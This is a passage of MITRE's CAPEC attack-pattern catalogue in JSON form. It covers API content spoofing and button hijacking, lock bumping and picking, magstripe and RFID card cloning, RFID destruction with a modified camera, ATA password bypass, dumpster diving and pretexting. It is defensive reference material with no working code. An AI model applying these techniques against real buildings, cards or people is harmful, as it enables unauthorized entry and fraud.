MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Resources_Required"}]}},"387":{"ID":"387","Name":"Navigation Remapping To Propagate Malicious Content","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers\' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers\' intent. When the goal is to spread malware, deceptive content is created such as modified links, buttons, or images, that entice users to click on those items, all of which point to a malicious URI. The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system in order to change the destination of various application interface elements.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"386"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle communications between the client and server, such as a man-in-the-middle proxy."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Resources_Required"}]}},"388":{"ID":"388","Name":"Application API Button Hijacking","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"386"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a adversary-in-the-middle (CAPEC-94) proxy."},"Example_Instances":{"Example":{"p":["An in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. The attacker, using a MITM proxy, observes the following data:","By altering the destination of \\"Claim_Link\\" to point to the attackers\' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking \\"Yes\\" or \\"No\\" causes the user to load the attackers\' code."],"div":["[Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link]",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Resources_Required"}]}},"389":{"ID":"389","Name":"Content Spoofing Via Application API Manipulation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers\' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers\' intent. The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"384"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle communications between the client and server, such as an adversary-in-the-middle proxy."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"353"}},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Resources_Required"}]}},"390":{"ID":"390","Name":"Bypassing Physical Security","Abstraction":"Meta","Status":"Draft","Description":"Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points.","References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"391":{"ID":"391","Name":"Bypassing Physical Locks","Abstraction":"Standard","Status":"Draft","Description":"An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"390"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}}},"392":{"ID":"392","Name":"Lock Bumping","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"391"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}}},"393":{"ID":"393","Name":"Lock Picking","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"391"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}}},"394":{"ID":"394","Name":"Using a Snap Gun Lock to Force a Lock","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"391"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}}},"395":{"ID":"395","Name":"Bypassing Electronic Locks and Access Controls","Abstraction":"Standard","Status":"Draft","Description":"An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"390"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"397":{"ID":"397","Name":"Cloning Magnetic Strip Cards","Abstraction":"Detailed","Status":"Draft","Description":"An attacker duplicates the data on a Magnetic strip card (i.e. \'swipe card\' or \'magstripe\') to gain unauthorized access to a physical location or a person\'s private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker\'s desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"}}},"398":{"ID":"398","Name":"Magnetic Strip Card Brute Force Attacks","Abstraction":"Detailed","Status":"Draft","Description":"An attacker analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals. Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks. For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"Prerequisites":{"Prerequisite":"The ability to calculate a card checksum and write out a valid checksum value. Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created."},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"}}},"399":{"ID":"399","Name":"Cloning RFID Cards or Chips","Abstraction":"Detailed","Status":"Draft","Description":"An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse. RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user\'s identification.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"}}},"400":{"ID":"400","Name":"RFID Chip Deactivation or Destruction","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it. When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system Various methods exist for damaging or deactivating RFID tags. For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"}}},"401":{"ID":"401","Name":"Physically Hacking Hardware","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system\'s integrity for the purpose of carrying out an attack.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"440"}},"Example_Instances":{"Example":"A malicious subcontractor or subcontractor\'s employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1263"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Attack_Patterns, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Related_Weaknesses"}],"Previous_Entry_Name":["Hacking Hardware Devices or Components",{"Date":"2015-11-09"},"Hacking Hardware",{"Date":"2020-07-30"}]}},"402":{"ID":"402","Name":"Bypassing ATA Password Security","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"401"}},"Prerequisites":{"Prerequisite":"Access to the system containing the ATA Drive so that the drive can be physically removed from the system."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"285"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"406":{"ID":"406","Name":"Dumpster Diving","Abstraction":"Detailed","Status":"Stable","Description":"An adversary cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more. By collecting this information an adversary may be able to learn important facts about the person or organization that play a role in helping the adversary in their attack.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"163"}]},"Prerequisites":{"Prerequisite":"An adversary must have physical access to the dumpster or downstream processing facility."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Documents and materials improperly disposed of can lead to information disclosure if an adversary comes across it."}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Social Information Gathering via Dumpster Diving",{"Date":"2017-08-04"}]}},"407":{"ID":"407","Name":"Pretexting","Abstraction":"Standard","Status":"Draft","Description":"An adversary engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the adversary\'s interests. During a pretexting attack, the adversary creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information. Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. In simple form, these attacks can be leveraged to learn information about a target. More complicated iterations may seek to solicit a target to perform some action that assists the adversary in exploiting organizational weaknesses or obtaining access to secure facilities or systems. Pretexting is not a one-size fits all solution. Good information gathering techniques can make or break a good pretext. A solid pretext is an essential part of building trust. If an adversary\u2019s alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"416"},{"Nature":"ChildOf","CAPEC_ID":"410"},{"Nature":"CanPrecede","CAPEC_ID":"163"}]},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the pretext that would influence the actions of the specific target."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Depending on the adversary\'s intentions and the specific nature their actions/requests, a successful pretexting attack can result in the compromise to the confidentiality of sensitive information in a variety of contexts."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks."},"Example_Instances":{"Example":"The adversary dresses up like a jogger and runs in place by the entrance of a building, pretending to look for their access card. Because the hood obscures their face, it may be possible to solicit someone inside the building to let them inside."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Social Information Gathering via Pretexting",{"Date":"2017-08-04"}]}},"410":{"ID":"410","Name":"Information Elicitation","Abstraction":"Meta","Status":"Draft","Description":"An adversary engages an individual using any combination of social engineering methods for the purpose of extracting information. Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks.","Typical_Severity":"Low","References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},"Previous_Entry_Name":["Information Elicitation via Social Engineering",{"Date":"2017-08-04"}]}},"412":{"ID":"412","Name":"Pretexting via Customer Service","Abstraction":"Detailed","Status":"Draft","Description":"An adversary engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary\'s interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407","Exclude_Related":{"Exclude_ID":"513"}}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"413":{"ID":"413","Name":"Pretexting via Tech Support","Abstraction":"Detailed","Status":"Draft","Description":"An adversary engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary\'s interests. An adversary who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an adversary physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. However, this form of attack does not require physical access as it can also be effectively carried out via phone or email.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407","Exclude_Related":{"Exclude_ID":"513"}}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"414":{"ID":"414","Name":"Pretexting via Delivery Person","Abstraction":"Detailed","Status":"Draft","Description":"An adversary engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary\'s interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. Usually the hardest part is looking the part and having all of the proper credentials, papers and \\"deliveries\\" in order to be able to pull it off.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407","Exclude_Related":{"Exclude_ID":"513"}}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"415":{"ID":"415","Name":"Pretexting via Phone","Abstraction":"Detailed","Status":"Draft","Description":"An adversary engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the adversary\'s interests. This is the most common social engineering attack. Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk 